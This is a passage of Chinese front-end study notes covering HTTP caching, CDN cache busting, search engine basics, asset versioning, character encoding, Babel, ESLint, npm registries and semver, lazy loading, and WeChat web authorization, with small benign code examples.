**强制缓存:**根据缓存标识来决定缓存是否有效,若没有缓存标识和结果则直接请求服务器;若存在但失效则发起协商缓存请求过程;若存在且有效则直接返回; 标识: 在 http1.0 时代,给客户端设定缓存方式可通过两个字段——Pragma和Expires来规范。Pragma是用来禁用缓存的,因此Expires(-1或0则是不缓存)就是用来开启缓存的,如果二者同时存在,则起作用的是Pragma `Expires`是http1.0的产物,值为服务器返回该请求结果缓存的到期时间,绝对时间,若身处不同时区则不准确,因此http1.1出现了`Cache-control`,二者同时存在时`Cache-control`优先级高,是控制浏览器和其他中间缓存如何缓存各个响应以及缓存多久。有以下几种取值(多个取值可以逗号分隔): 1. public 所有内容都将被缓存(客户端和代理服务器都可缓存),即使标识显示不可缓存,也可以缓存 2. private 所有内容只有对应的单个用户可以缓存,Cache-Control的默认取值,例如,用户的浏览器可以缓存包含用户私人信息的 HTML 网页,但 CDN 却不能缓存。 3. no-cache:客户端缓存内容,但是是否使用缓存则需要经过协商缓存来验证决定,即每次通过标识(如ETag)先与服务器确认缓存是否变化,如果没有变化则可以继续使用。 4. no-store:直接禁止浏览器以及所有中间代理缓存任何版本的响应 5. max-age=xxx (xxx is numeric):缓存内容将在xxx秒后失效 当二者同时存在Cache-control优先级高。no-cache和no-store的区别是前者会缓存,但每次请求时依然先拿到缓存,只是不做验证,然后请求服务器,服务器来决定是否用缓存。 参考:https://juejin.im/post/6844903801778864136 **优先级:** Pragma > Cache-control > Expires 内存缓存(内存缓存会将编译解析后的文件,直接存入该进程的内存中,一旦进程关闭则进程的内存就清空)和硬盘缓存 **协商缓存:** 强制缓存失效后,浏览器携带协商缓存标识向**服务器**发起请求,由服务器根据缓存标识来决定是否使用缓存的过程。 协商缓存生效,返回304过程: ![consultCache](http://wx2.sinaimg.cn/mw690/006XbPrRly1gbk9d0yf6uj30su0nqjva.jpg) ***务必注意:***协商缓存是先去请求服务器,判断是否更新,若没有更新则返回304码。然后再去浏览器缓存中拿数据,之所以发送条件请求是因为若条件成功,则可以省略传输响应体的时间,但连接还是需要建立的。如果不想304则可以强制刷新, 同样,协商缓存的标识也是在响应报文的HTTP头中和请求结果一起返回给浏览器的,控制协商缓存的字段分别有:Last-Modified / If-Modified-Since和Etag / If-None-Match,`其中Etag / If-None-Match的优先级比Last-Modified / If-Modified-Since高`。 强制缓存优先于协商缓存,若强制缓存生效则直接使用,若不生效则进行协商缓存,协商缓存由服务器确定是否使用。 总的过程如下: ![consultCache](http://wx4.sinaimg.cn/mw690/006XbPrRly1gbk9d0yz4bj30t00p4afc.jpg) 在 Chrome 的 devtools 中勾选 Disable cache 选项,发送的请求会去掉 If-Modified-Since 这个 Header。同时设置 Cache-Control:no-cache Pragma:no-cache,每次请求均为 200 Expires:HTTP1.0 的特性,标识该资源过期的时间点,它是一个绝对值,格林威治时间(Greenwich Mean Time, GMT),即在这个时间点之后,缓存的资源过期;优先级:Cache-Control 优先级高于 Expires,为了兼容,通常两个头部同时设置;浏览器默认行为:其实就算 Response Header 中沒有设置 Cache-Control 和 Expires,浏览器仍然会缓存某些资源,这是浏览器的默认行为,是为了提升性能进行的优化,每个浏览器的行为可能不一致,有些浏览器甚至没有这样的优化。 Last-Modified(Response Header)与 If-Modified-Since(Request Header)是一对报文头,属于 http 1.0。 If-Modified-Since 是一个请求首部字段,并且只能用在 GET 或者 HEAD 请求中。Last-Modified 是一个响应首部字段,包含服务器认定的资源作出修改的日期及时间。当带着 If-Modified-Since 头访问服务器请求资源时,服务器会检查 Last-Modified,如果 Last-Modified 的时间早于或等于 If-Modified-Since 则会返回一个不带主体的 304 响应,否则将重新返回资源。(注意:在 Chrome 的 devtools 中勾选 Disable cache 选项后,发送的请求会去掉 If-Modified-Since 这个 Header。) ETag 能解决什么问题? - Last-Modified 标注的最后修改只能精确到秒级,如果某些文件在 1 秒钟以内,被修改多次的话,它将不能准确标注文件的新鲜度; - 某些文件也许会周期性的更改,但是他的内容并不改变(仅仅改变的修改时间),但 Last-Modified 却改变了,导致文件没法使用缓存,因此不能说打开了,修改时间就发生了变化 - 有可能存在服务器没有准确获取文件修改时间,或者与代理服务器时间不一致等情形。 优先级:ETag 优先级比 Last-Modified 高,同时存在时会以 ETag 为准。 nginx 中 etag 由响应头的 Last-Modified 与 Content-Length 表示为十六进制组合而成。Last-Modified 是由一个 unix timestamp 表示,则意味着它只能作用于秒级的改变。 如果 http 响应头中 ETag 值改变了,是否意味着文件内容一定已经更改? 此时文件大小没有发生更改,ETag 不会改变。但这需要极其苛刻的条件:1s 内更改文件,并且保持文件大小不变。这种情况出现概率很低,因此忽略了 200 from prefetch cache 在 preload 或 prefetch 的资源加载时,两者也是均存储在 http cache,当资源加载完成后,如果资源是可以被缓存的,那么其被存储在 http cache 中等待后续使用;如果资源不可被缓存,那么其在被使用前均存储在 memory cache。 浏览器可以在内存、硬盘中开辟一个空间用于保存请求资源副本。我们经常调试时在 DevTools Network 里看到 Memory Cache(內存缓存)和 Disk Cache(硬盘缓存),指的就是缓存所在的位置。请求一个资源时,会按照优先级(Service Worker -> Memory Cache -> Disk Cache -> Push Cache)依次查找缓存,如果命中则使用缓存,否则发起请求。 ***浏览器刷新行为*** 1. 在URI输入栏中输入,然后回车/通过书签访问 2. F5(command + R)/点击工具栏中的刷新按钮/右键菜单重新加载 3. Ctrl + F5 / command + shift + R 第二种刷新方式:让浏览器无论如何都发送一个http请求给Server,也就是说即使在强制缓存生效的情况下,这次发送的请求头里会有类似`Cache-Control: max-age=0`的字样,也就是chrome让强制缓存失效。。。当然如果有协商缓存标识,则依然会带上,因此这种情况可能会返回304状态码。 第三种刷新方式:这种就是强制刷新,不但需要重新发送请求,而且将协商缓存标识全部去掉。。。为了保证从服务器拿到的内容是全新的(防止中间代理服务器缓存),还需要添加一些http headers如`Cache-Control: no-cache、Pragma: no-cache`,这样就能从服务端获取到最新的数据。**但需要注意**,假如这时的服务区并不是中央服务器,而是地区服务器,而地区服务器又没有及时拉取原服务器的文件,此时返给浏览器的仍然是旧文件。还有就是浏览器与地区服务器之间可能存在很多代理,如果代码不认无缓存请求头的话,返回的文件也是旧文件,但这种可能性很小。综上:这里的强制刷新的请求头对于浏览器和cdn服务器应该是没问题的,但不排除中间代理有问题,还有就是地区cdn服务器并没有及时与源服务器同步数据,这时都可能返回旧文件。 还有就是,一般情况下为了避免缓存问题,我们都习惯将文件名拼接上hash值,这样文件不同,肯定就会溯源找最新文件了。还有一种情况,文件名一直只是改变#、?号后面的值,这种情况严格来说文件是一样的,只是参数不同而已。如果这个cdn服务器比较智能,就是可以识别出这种文件是同一个文件,就有很大可能命中缓存。但如果这个cdn服务器比较耿直,严格按照uri来匹配资源,此时获取的反而是最新的文件。 许多放图片的CDN可以通过参数来调整图片,比如: xxx.com/a.png 是原图 xxx.com/a.png?w=1 xxx.com/a.png?q=90 是90%质量的图片280 是宽度压缩到1280px的图片 比如前端在代码里配的地址是:http://xxx.a.pdf 后续文件更新了,如果没有刷新缓存,前端地址也没变,访问的肯定是缓存的旧文件。 除非等到12小时自动更新缓存,或者手动强制刷新。但如果每次都刷新缓存,其实cdn的效果意义就不太大了。。。 所以下次,他们上传文件的时候,要么可以直接修改文件名再上传,比如修改为http://xxx.a.v1.pdf,然后前端再更新,这样最靠谱 还有就是配置前端的地址,改为http://xxx.a.pdf?124504524 这种时间撮模式,但这样也同样失去了cdn的意义,因为时间戳每次都变,所以每次都会去源服务器拉取最新的。另外一个缺点:不是很靠谱(因为有的智能cdn不会根据?后面的值进行对比) `Service Worker、Memory Cache、Disk Cache 和 Push Cache`,那请求的时候 from memory cache 和 from disk cache 的依据是什么? 1. 如果开启了Service Worker首先会从Service Worker中拿 2. 如果新开一个以前打开过的页面缓存会从Disk Cache中拿(前提是命中强缓存) 3. 刷新当前页面时浏览器会根据当前运行环境内存来决定是从 Memory Cache 还是 从Disk Cache中拿 ***关键字搜索发生了什么*** 获得网站网页资料,能够建立数据库并提供查询的系统,分为两个基本类别:**全文搜索引擎(FullText Search Engine)和分类目录Directory)** **全文搜索引擎**的数据库是依靠一个叫“网络机器人(Spider)”或叫“网络蜘蛛(crawlers)”的软件,通过网络上的各种链接自动获取大量网页信息内容,并按以定的规则分析整理形成的。Google、百度都是比较典型的全文搜索引擎系统。 **分类目录**则是通过人工的方式收集整理网站资料形成数据库的,比如雅虎中国以及国内的搜狐、新浪、网易分类目录。另外,在网上的一些导航站点,也可以归属为原始的分类目录,比如“网址之家”。 全文搜索引擎和分类目录在使用上各有长短。全文搜索引擎因为依靠软件进行,所以数据库的容量非常庞大,但是,它的查询结果往往不够准确;分类目录依靠人工收集和整理网站,能够提供更为准确的查询结果,但收集的内容却非常有限。 **全文搜索引擎的“网络机器人”或“网络蜘蛛”**是一种网络上的软件,它遍历Web空间,能够扫描一定IP地址范围内的网站,并沿着网络上的链接从一个网页到另一个网页,从一个网站到另一个网站采集网页资料。它为保证采集的资料最新,还会回访已抓取过的网页。 网络机器人或网络蜘蛛采集的网页,还要有其它程序进行分析,根据一定的相关度算法进行大量的计算建立网页索引,才能添加到索引数据库中。我们平时看到的全文搜索引擎,实际上只是一个搜索引擎系统的检索界面,当**你输入关键词进行查询时,搜索引擎会从庞大的数据库中找到符合该关键词的所有相关网页的索引,并按一定的排名规则呈现给我们**。不同的搜索引擎,网页索引数据库不同,排名规则也不尽相同 原理可以分为三步: 1. 从互联网上抓取网页 利用能够从互联网上自动收集网页的Spider系统程序,自动访问互联网,并沿着任何网页中的所有URL爬到其它网页,重复这过程,并把爬过的所有网页收集回来。 2. 建立索引数据库 由分析索引系统程序对收集回来的网页进行分析,提取相关网页信息(包括网页所在URL、编码类型、页面内容包含的关键词、关键词位置、生成时间、大小、与其它网页的链接关系等),根据一定的相关度算法进行大量复杂计算,得到每一个网页针对页面内容中及超链中每一个关键词的相关度(或重要性),然后用这些相关信息建立网页索引数据库。 3. 在索引数据库中搜索排序 当用户输入关键词搜索后,由搜索系统程序从网页索引数据库中找到符合该关键词的所有相关网页。因为所有相关网页针对该关键词的相关度早已算好,所以只需按照现成的相关度数值排序,相关度越高,排名越靠前。 最后,由页面生成系统将搜索结果的链接地址和页面内容摘要等内容组织起来返回给用户。 #### ***版本控制相关*** 前端所谓的版本控制,一般说的是前端资源(比如css,js,img等)的版本控制和代码的版本控制系统(git,svn等); **前端资源版本管理** 前端资源的版本控制主要是解决缓存问题的。。。例如:文件内容修改了,但名字没有改,浏览器不强制刷新则访问的则很可能是缓存里的内容。如果每次修改都给文件添加一个版本号,势必繁琐(为了统一版本,每次修改一个文件都需要将其他所有文件的版本号更新)。既然版本号不易控制,若根据文件内容生成hash值,将版本号改为hash值,会稍微好一些。但对于大型应用,资源文件一般部署在cdn上,主文件部署在服务器上,那二者谁先发布呢?如下 ```js <link rel="stylesheet" href="a.css?v=e0279"></link> <script src="a.js?v=abb35"></script> ``` 1. 先发资源文件,之前的资源文件被覆盖,在主文件发布成功之前,没有缓存或强制刷新的用户,会导致页面错乱 2. 先发主文件,在资源文件发布成功之前,用户访问到得资源文件都是旧的 因为上面文件的url只是query不同,因此相当于同一个文件,所以是覆盖式。。。如果将文件名改了,则就不存在覆盖的问题了,这样新版和旧版资源文件就同时存在,于是代码变成如下: ```js <link rel="stylesheet" href="a.e0279.css"></link> <script src="a.e0279.js"></script> ``` 此时先发布资源文件,成功后再发布主文件就没有问题了。 而如何生成这个hash就是构建的工作了,主要有`hash、chunkhash、contenthash`三种: 1. hash与整个项目构建相关,一个文件改变则所有文件都变 2. chunkhash是根据入口文件进行解析、构建对应的chunk的,生成对应的hash值 3. contenthash是针对文件内容级别,只有文件内容改变才会改变 之所以出现contenthash,是因为chunkhash有个问题,比如a文件修改了,则与其关联(如引用)的相关文件的hash值也会改变,也就失去缓存的目的了,如下: ![dpr&ppi](/jsArt/assets/images/js-theory/chunk-contenthash.png) **代码版本管理** 代码版本管理主要分集中式(svn)和分布式(git),那二者什么区别呢? 集中式:版本库是集中存放在中央服务器的,干活的时候先联网拉下代码,然后修改,改完再推送到服务器。没有网络无法工作,好比图书馆,不开馆没法借书。主要问题就是严重依赖网络 分布式:不需要联网没有中央服务器,每人电脑上的都是一个完整的版本库。不联网时如何多人协作,其实网络说的是外网,局域网还是需要的,相互之间的修改就可以通过局域网相互之间推送。。。其实即使分布式,我们也很少相互之间推送代码,而是将代码推送到一台充当“中央服务器”的地方,这里的“中央服务器”只是方便大家相互之间交流而已,以防止同事请假,电脑故障等情况。。。 从上面看感觉分布式比集中式的优势就是不需要联网,其实作为分布式的代表git,在分支管理上远胜于svn!!! #### ***编码相关*** 编码其实就是一种数据格式转换为另外一种格式的过程。 **ASCII码**计算机最终识别的是二进制数据格式,一个字节八位,也就是256种状态,每种状态可以用一个字符表示。而美国制定的英文字符与二进制数的映射就是ASCII码,一直用到现在。 在ASCII中,用7个二进制位表示一个打印或不可打印的字符,共表示128个字符,其中95个可打印或显示的字符,其他的则为不可打印或显示的字符。所谓不可打印是指那些禁止在报纸,电视或其他媒体上出现的符号,这些符号被用来表示一些特定的功能,如回车,换行,制表符等。。。比如空格SPACE是32(二进制00100000),大写的字母A是65(二进制01000001)。这128个符号,只占用了一个字节的后面7位,最前面的一位统一规定为0。 英文字符7位就可以表示完全,但对于汉语而言就远远不够了,汉字大概就是10万+,两个字节才表示65535种,因此汉语还有四字节表示一个字。也就是中国的国标GB 但世界各国的编码都不一样,有么有一种方式可以统一呢,这就是**unicode码**,虽然unicode码解决了是否统一的问题,但数据在网络上传输时是需要占带宽的,因此如何合理存储这些编码就尤为重要,因为一个英文字符用unicode来表示势必占更多内存。。。因此就出现了**utf-8**,是unicode编码的实现方式之一。对于部分编码,存储时还涉及`Little endian 和Big endian-`问题,也就是字节存储的先后顺序问题。 **base64编码**Base64是一种基于64个可打印字符来表示二进制数据的表示方法。由于2的6次方等于64,所以每6个二进制位为一个单元,对应某个可打印字符。三个字节有24个二进制位(比特位),对应于4个Base64单元,即3个字节对应的符号可以用4个可打印字符表示。之所以诞生,因为早期http协议等都只能传输ascii格式,但有些数据(比如图片)转化为二进制后,超过了ascii表示的范围。 btoa可以将字符串转为base64格式,而atob是将base64转为正常字符串,是window下的api ```js // base64编码 btoa('this is a example'); => "dGhpcyBpcyBhIGV4YW1wbGU=" // base64解码 atob("dGhpcyBpcyBhIGV4YW1wbGU=") 'this is a example' ``` `1. URI编码方法` 在因特网上传送URL,只能采用ASCII字符集,也就是说URL只能使用英文字母、阿拉伯数字和某些标点符号,不能使用其他文字和符号,即只有字母和数字[0-9a-zA-Z]、一些特殊符号$-_.+!*'()[不包括双引号]、以及某些保留字(空格转换为+),才可以不经过编码直接用于URL,这意味着 如果URL中有汉字,就必须编码后使用。 但是麻烦的是 标准的国际组织并没有规定具体的编码方法,而是交给应用程序(浏览器)自己决定。 这导致"URL编码"成为了一个混乱的领域。 Global 对象的`encodeURI()和encodeURIComponent()`方法可以对`URI`(`Uniform Resource Identifiers`,通用资源标识符)进行编码,以便发送给浏览器。**有效的 URI 中不能包含某些字符,例如空格**。而这两个 URI 编码方法就可以对 URI 进行编码,**它们用特殊的 UTF8 编码替换所有无效的字符,从而让浏览器能够接受和理解**。 ```js // encodeURI()一般对整个uri进行编码, encodeURI(";,/?:@&=+$-_.!~*'()#"); // ";,/?:@&=+$-_.!~*'()#",几乎常用的都没有被编码 encodeURI(" "); // "%20",空格被编码了 decodeURI("%20"); // " " // encodeURIComponent()只对一段,一般是编码location.origin后面的部分 encodeURIComponent("().!~*'-_"); // "().!~*'-_" encodeURIComponent(":/ ?&=#"); // "%3A%2F%20%3F%26%3D%23" decodeURIComponent("%3A%2F%20%3F%26%3D%23"); // ":/ ?&=#" // 解码被编码多次的url let str = "https%3A%2F%2Fwww.baidu.com%2F%3Fa%3D%25E4%25B8%25AD" const isEncode = str => str.includes('%25'); const getDecodeUrl = str => { while(isEncode(str)) { str = decodeURIComponent(str); } return decodeURIComponent(str) } getDecodeUrl(str) ``` 中文域名(需要中文转码成ascii码) **视频编码** 视频文件本身其实是一个容器(container),里面包括了视频和音频,也可能有字幕等其他内容。 常见的AVI、RMVB、MKV、ASF、WMV、MP4、3GP、FLV等文件其实只能算是一种封装标准。 一个完整的视频文件是由音频和视频2部分组成的。H264、Xvid等就是视频编码格式,MP3、AAC等就是音频编码格式。 衡量视频,又是用的什么指标参数呢?最主要的一个,就是帧率(Frame Rate)。在视频中,一个帧(Frame)就是指一幅静止的画面。帧率,就是指视频每秒钟包括的画面数量(FPS,Frame per second)。 [视频编码](https://juejin.im/post/5dd359f4e51d453af47cea29) #### ***构建相关*** ***部署脚本*** ***Babel*** 参考:[babel中文文档(官方)][babelChineseDocsUrl] 是一个js编译器,支持代码里写高版本的代码,通过语法转换器支持最新版本的js语法,但babel只转换语法(如箭头函数),若需要支持新的api或全局变量,需要用polyfill。 polyfill和shim很像但又不同,shim的话是引入一个库,将不同的api封装成一种,比如 jQuery 的 $.ajax 封装了 XMLHttpRequest 和 IE 用 ActiveXObject 方式创建 xhr 对象;而polyfill 是 shim 的一种,一个polyfill就是一个用在浏览器API上的shim。我们通常的做法是先检查当前浏览器是否支持某个API,如果不支持的话就加载对应的polyfill.然后新旧浏览器就都可以使用这个API了 babel 是js的编译器,是将下一代js的语法编译成各个平台都兼容的语法格式。官网不同平台上的使用方式,无非是安装babel的核心代码及各种presets,plugin。。。 **注意**,presets与plugin的关系,其实babel有很多细粒度很小的插件,具体转译那种语法可以按需引入,这样有很强的灵活性。。。但假如有很多语法都需要转化,则需要引入很多,此时babel官方就提供了plugin的合集,也就是presets。 而`babel-preset-env`就相当于 es2015 ,es2016 ,es2017 及最新版本。 而stage是将TC39 提案分为以下几个阶段: - Stage 0 - 稻草人: 只是一个想法,可能是 babel 插件。 - Stage 1 - 提案: 初步尝试。 - Stage 2 - 初稿: 完成初步规范。 - Stage 3 - 候选: 完成规范和浏览器初步实现。 - Stage 4 - 完成: 将被添加到下一年度发布。 stage只是提案,是否最终发布不能确定,只是实验性的语法,而env则是发布的。 同时配置了plugin和presets后,会有一个执行顺序如下: - Plugin 会运行在 Presets 之前。 - Plugin 会从第一个开始顺序执行。ordering is first to last. - Preset 的顺序则刚好相反(从最后一个逆序执行)。 总结起来,`env`是纳入规范的新语法特性,而stage则是未纳入规范的提案,但有些api的调用并不是什么新的语法,比如Array.isArray这个方法在低版本ie浏览器中,就无法执行,因此还需要polyfill(当然自己写个方法实现也可以)。。。 还要知道`babel-polifill`是与普通针对单个polifill是有区别的,它的初衷是模拟(emulate)一整套 ES2015+ 运行时环境,所以它的确会以全局变量的形式 polyfill Map、Set、Promise 之类的类型,也的确会以类似 Array.prototype.includes() 的方式去注入污染原型,这也是官网中提到最适合应用级开发的 polyfill,再次提醒如果你在开发 library 的话,不推荐使用(或者说绝对不要使用)。 babel-polyfill:需要在你自己的代码中手工引入(最好放在 vendor 里),它会以全局变量污染的方式 polyfill 内建类(如 Map、Set、Promise 等),同时也会通过修改 Array、String、Object 等原型的方式添加实例方法(如 Array.prototype.includes()、String.prototype.padStart() 等),内建类的静态方法(如 Array.from() 等)也会被 polyfill。babel-polyfill 适合于开发独立的业务应用,及时全局污染、prototype 被修改也不会受到太大的影响,babel-polyfill 不适合开发第三方类库。 babel-plugin-transform-runtime:需要你在 .babelrc 或 Babel 编译选项中将该插件添加到 plugins 中,插件只会 polyfill 你用到的类或方法,由于采用了沙盒(Sandbox)机制,它不会污染全局变量,同时也不会去修改内建类的原型,带来的坏处是它不会 polyfill 原型上的扩展(例如 Array.prototype.includes() 不会被 polyfill,Array.from() 则会被 polyfill)。插件的方式适合于开发第三方类库,不适合开发需要大量使用 Array 等原型链扩展方法的应用。 ***Eslint*** 是js代码检查工具,代码检查是一种静态的分析,常用于寻找有问题的模式或者代码。对于大多数编程语言来说都会有代码检查,一般来说编译程序会内置检查工具。 js是动态的弱类型的语言,开发中容易出错,因为没有编译程序,为了寻找错误需要在代码运行过程中debugger,而eslint可以让程序元在编码的过程中发现问题而不是在执行的过程中。 eslint有自己的默认配置,还可以自定义配置 [eslint参考](https://www.jianshu.com/p/bf0ffe8e615a) 一般使用eslint都会在package.json里配置脚本,比如 使用cross-env解决跨平台设置NODE_ENV的问题,在大多数Windows命令行中在使用NODE_ENV = production设置环境变量时会报错。同样,Windows和Linux命令如何设置环境变量也有所不同。 使用cross-env可以设置在不同的平台上有相同的NODE_ENV参数。 ```json "scripts": { "dev": "cross-env BABEL_ENV=development webpack-dev-server --inline --progress --config build/webpack.dev.conf.js", "build:prod": "cross-env NODE_ENV=production env_config=prod node build/build.js", "build:sit": "cross-env NODE_ENV=production env_config=sit node build/build.js", "lint": "eslint --ext .js,.vue src", "test": "npm run lint", "precommit": "lint-staged", "svgo": "svgo -f src/icons/svg --config=src/icons/svgo.yml" }, "lint-staged": { "src/**/*.{js,vue}": [ "eslint --fix", "git add" ] }, ``` 上面是摘自vue-element-admin的一段,一般在代码完成开发之后,先执行`precommit`,进而会调用eslint的命令,然后根据`.eslintrc.js`配置文件检查项目里的错误,如果有配置错误级别代码格式,并检测到,eslint会指出错误信息。。。然后开发再手动修改错误,再次执行`precommit`并自动修复了问题(这时候只是将文件添加进了暂存区),后续还需要commit,然后才是push等操作 eslint单个文件检测规则 ```js // 1/整个文件范围内禁止规则出现警告 // 将/* eslint-disable */放置于文件最顶部 /* eslint-disable */ alert('foo'); // 2、在文件中临时禁止规则出现警告 // 将需要忽略的代码块用注释包裹起来 /* eslint-disable */ alert('foo'); /* eslint-enable */ // 3、对指定规则的启用或者禁用警告 // 将需要忽略的代码块用注释包裹起来 /* eslint-disable no-alert, no-console */ alert('foo'); console.log('bar'); /* eslint-enable no-alert, no-console */ // 4、对指定行禁用规则警告 // 此方法,有两种形式,参见下方。 alert('foo'); // eslint-disable-line // eslint-disable-next-line alert('foo'); // 5、在指定行上禁用指定的某个规则 alert('foo'); // eslint-disable-line no-alert // eslint-disable-next-line no-alert alert('foo'); // 6、在某个特定的行上禁用多个规则 alert('foo'); // eslint-disable-line no-alert, quotes, semi // eslint-disable-next-line no-alert, quotes, semi alert('foo'); ``` ***npm私服*** npm私服其实就是npm私人服务器,比如cnpm是淘宝的npm镜像,主要目的是下载包的速度快。。。私服需要定时同步npm上的包,(node里有node-scheduled定时任务的包),多数企业项目比较少且简单,单独做私服的意义不是很大。。。 个人在github上的仓库因为是免费的,没有私有仓库一说,但企业一般是付费的,可以建立自己的私有仓库。 私有库的话,需要配置register ,比如`npm config set @mfs:registry http://xxx.net/`,当然也可以直接配置`~/.npmrc`,如果在项目里配置了`.npmrc`文件也可以,比如: ```bash # .npmrc @mfs:registry=http://registry.npm.missfresh.net @mfb:registry=https://registry.npm.taobao.org ``` npm发包其实就是将自己的仓库标准化并公开给所有人,然后用户通过npm search就可以找到包(如果没有发包,则需要找到对应的仓库去克隆),这里的npm search在使用淘宝镜像的情况下不太好使。。。 ***npm包版本命名规则*** npm 使用 semver 包进行版本号解析。 1.15.2对应的版本时`MAJOR.MINOR.PATCH`: - 1是marjor version; - 15是minor version; - 2是patch version。 MAJOR:这个版本号变化了表示有了一个不可以和上个版本兼容的大更改。 MINOR:这个版本号变化了表示有了增加了新的功能,并且可以向后兼容。 PATCH:这个版本号变化了表示修复了bug,并且可以向后兼容。 因此在工作中,其实保持minor版本即可,这样出现的问题能少些。。。即使后续引入新功能,可以再修改 但你还可能经常看到~,^符号,他们什么意思呢? **波浪符号(~):**他会更新到当前minor version(也就是中间的那位数字)中最新的版本。放到我们的例子中就是:body-parser:~1.15.2,这个库会去匹配更新到1.15.x的最新版本,如果出了一个新的版本为1.16.0,则不会自动升级。波浪符号是曾经npm安装时候的默认符号,现在已经变为了插入符号。 **插入符号(^):**这个符号就显得非常的灵活了,他将会把当前库的版本更新到当前major version(也就是第一位数字)中最新的版本。放到我们的例子中就是:bluebird:^3.3.4,这个库会去匹配3.x.x中最新的版本,但是他不会自动更新到4.0.0。 参考以下(很多规则渗入了人的主观因素,遵循大规律即可): ```js ^1.2.3 := >=1.2.3 <2.0.0 ^0.2.3 := >=0.2.3 <0.3.0 ^0.0.3 := >=0.0.3 <0.0.4 ~1.15.2 := >=1.15.2 <1.16.0 ^3.3.4 := >=3.3.4 <4.0.0 ``` #### **npm 与 cnpm 区别** 用 cnpm 安装一些依赖的时候,有时候会有问题。。。但直接用 npm 则需要科学上网,可以尝试配置[npm-config-china][mirrorconfigchinaurl],虽然里面很多代理依然是淘宝镜像,但还是有差别。。。刚开始配 npm,可能回慢些,这是因为缓存的问题。。。用的多了就好了 1. npm 可以自由配置镜像源 2. 两者缓存位置不同 3. cnpm 安装的库会放在 node_modules 里以下划线开头的文件夹,然后链接到应该在的位置 4. npm 有更多功能(link、audit、publish、npx 等等) 所有 npm 包都是针对 npm 做的,所以最好使用 npm,以防在某个地方被他们的差异坑了 **注意:**其实`npm`和`cnpm`主要差别还是镜像源,因为很多包都是国外的,在国内使用就很慢,因此`cnpm`就做了一个拷贝,但是资源是拷贝过来了,但与`npm`相关的很多`api`则无法通过拷贝过来,因此`cnpm`有些局限性。。。如果通过[npm-config-china][mirrorconfigchinaurl]它来配置,则不但将镜像源改为国内,同时还可以消除`cnpm`的一些怪癖(比如软连接),另外就是完全保留了`npm`的各个`api`。 安装后通过`npm config list`可以查看具体的配置,当然也可以直接访问配置源文件`~/.npmrc` 如果一个包用`npm`下载不下来,可以尝试使用`cnpm`,两者不干扰。 参考:[cnode 社区说 npm][cnodesaynpmurl]、[在中国更换 npm 源][changenpmregistry] #### **npm 与 yarn 区别** “Yarn是由Facebook、Google、Exponent 和 Tilde 联合推出了一个新的 JS 包管理工具 ,正如官方文档中写的,Yarn 是为了弥补 npm 的一些缺陷而出现的。 之前yarn解决了npm的几个痛点,比如版本锁定,慢,但又有人说5.5版本后npm改进了,但现在依然很多人说yarn的优势比较明显。 ##### **懒加载** 参考:[懒加载(知乎)](https://zhuanlan.zhihu.com/p/25455672) - offsetTop:当前元素顶端距离父元素顶端距离,鼠标滚轮不会影响其数值. - scrollTop:当前元素顶端距离窗口顶端距离,鼠标滚轮会影响其数值. ```js function lazyload () { var images = document.getElementsByTagName( 'img' ); var len = images.length; var n = 0; // 存储图片加载到的位置,避免每次都从第一张图片开始遍历 return function () { var seeHeight = document.documentElement.clientHeight; var scrollTop = document.documentElement.scrollTop || document.body.scrollTop; for ( var i = n; i < len; i++ ) { if ( images[ i ].offsetTop < seeHeight + scrollTop ) { if ( images[ i ].getAttribute( 'src' ) === 'images/loading.gif' ) { images[ i ].src = images[ i ].getAttribute( 'data-src' ); } n = n + 1; } } } } var loadImages = lazyload(); loadImages(); //初始化首页的页面图片 // 需要节流 window.addEventListener( 'scroll', loadImages, false ); ``` ##### **预加载** 其实就等到页面加载完资源以后,再去请求接口获取图片数据,如下: ```js var images = new Array() function preload () { for ( i = 0; i & lt; preload.arguments.length; i++) { images[ i ] = new Image() images[ i ].src = preload.arguments[ i ] } } preload( "http://qiniu.cllgeek.com/react02.png", "http://qiniu.cllgeek.com/react03.png", "http://qiniu.cllgeek.com/react04.png" ) ``` ***前端优化性能清单*** 参考:[前端优化性能清单][frontEndOptimizeUrl] ***vue性能优化*** 参考:[vue性能优化][vueOptimizeUrl]、[vue3.0优化(尤大)][vue3.0OptimizeUrl] ***css性能优化*** 参考:[css性能优化的8个技巧][eightCssOptimizeUrl] #### ***IDE相关*** node.js事件循环,$nextTick的原理(如何找到dom),依赖收集过程,tab页面间通信(postmessage),diff算法具体实现过程,node.js的前端js模板(ejs,pug),数组去重,数组方法及每个作用,项目优化点,Promise实现原理(构造函数自执行),async与await #### ***微信相关*** **微信网页授权流程**: 1. 用户同意授权(两种授权方式),前端从微信服务器获取code码 2. 前端将code发送给公司后台,公司后台拿着code和服务号的appid及appSecret去微信服务器请求 3. 微信服务器给后台返回用户信息、access_token、refresh_token等。后台可以拿着access_token去调用其他接口 4. 后台再将用户信息返回给前端。 **注意:**小程序的授权流程和上边差不多,只是微信服务器返回的是`openid,session_key,unionid`(一定条件下返回)。`session_key`是微信给公司后台颁发的身份凭证,然后公司后台就可以用它请求微信的其他的一些接口。**因此**,`session_key`不应该泄露或给小程序前端。 获取用户的openId后,公司后台就可以将一些用户信息与此绑定,并生成一个`sessionId`,然后就可以发送给前端,前端后续的请求都会携带这个`sessionId`,然后服务端就可以根据`sessionId`查询到当前登录用户的身份。还可以将`sessionId`缓存到本地,以便在还没过期的时候重复利用,以提高通信的性能。 **两种授权模式**: - 静默授权,获取用户的openid - 提示授权,获取用户的基本信息 微信网页授权是通过OAuth2.0机制实现的,在用户授权给公众号后,公众号可以获取到一个网页授权特有的接口调用凭证(网页授权access_token),通过网页授权access_token可以进行授权后接口调用,如获取用户基本信息; **微信JS-SDK**: 1. JS-SDK是javascript software development kit,即js软件开发工具包,是能够让开发者开发出应用程序的软件包,一般sdk包括一个或多个api,开发工具集合说明文档等。 2. 通过使用微信JS-SDK,网页开发者可借助微信高效地使用拍照、选图、语音、位置等手机系统的能力,同时可以直接使用微信分享、扫一扫、卡券、支付等微信特有的能力,为微信用户提供更优质的网页体验。 3. 这里前端主要用了微信分享接口, **调用过程:**: jsapi_ticket是调用微信js接口需要临时票据(当然这些工作都是后端做的) 1. 获取access_token(参考网页授权流程) 2. 公司后台拿着access_token去获取jsapi_ticket 3. 前端拿着当前页面的地址信息请求后台获取签名 4. 后台获取到前端发送的地址信息,进而生成签名返回给前端 5. 前端拿到签名,通过wx.config()接口注入权限验证配置 6. 配置通过后,调用wx.ready(function(){})执行分享操作 **微信开发者工具** 通过模拟微信客户端的表现,使得开发者可以使用这个工具方便地在pc或mac上进行开发和调试工作。 1. 可以使用自己的微信号来调试微信网页授权 2. 